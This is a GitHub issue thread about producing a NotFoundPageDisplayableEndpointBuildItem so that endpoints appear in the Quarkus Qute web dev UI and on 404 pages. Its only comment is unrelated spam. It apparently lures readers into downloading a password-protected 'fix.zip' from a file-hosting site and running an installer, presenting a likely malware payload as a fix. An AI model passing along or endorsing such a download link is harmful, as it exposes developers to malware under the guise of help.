### ISSUE TITLE
Produce NotFoundPageDisplayableEndpointBuildItem to have the list of endpoints in the dev-ui (and 404)

### ISSUE THREAD

**Issue by ia3andy** [quarkiverse/quarkus-qute-web#107]
![image](https://github.com/user-attachments/assets/6e1aaefc-31d3-420a-bf94-852d9113612b)

It would be displayed here 👆

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
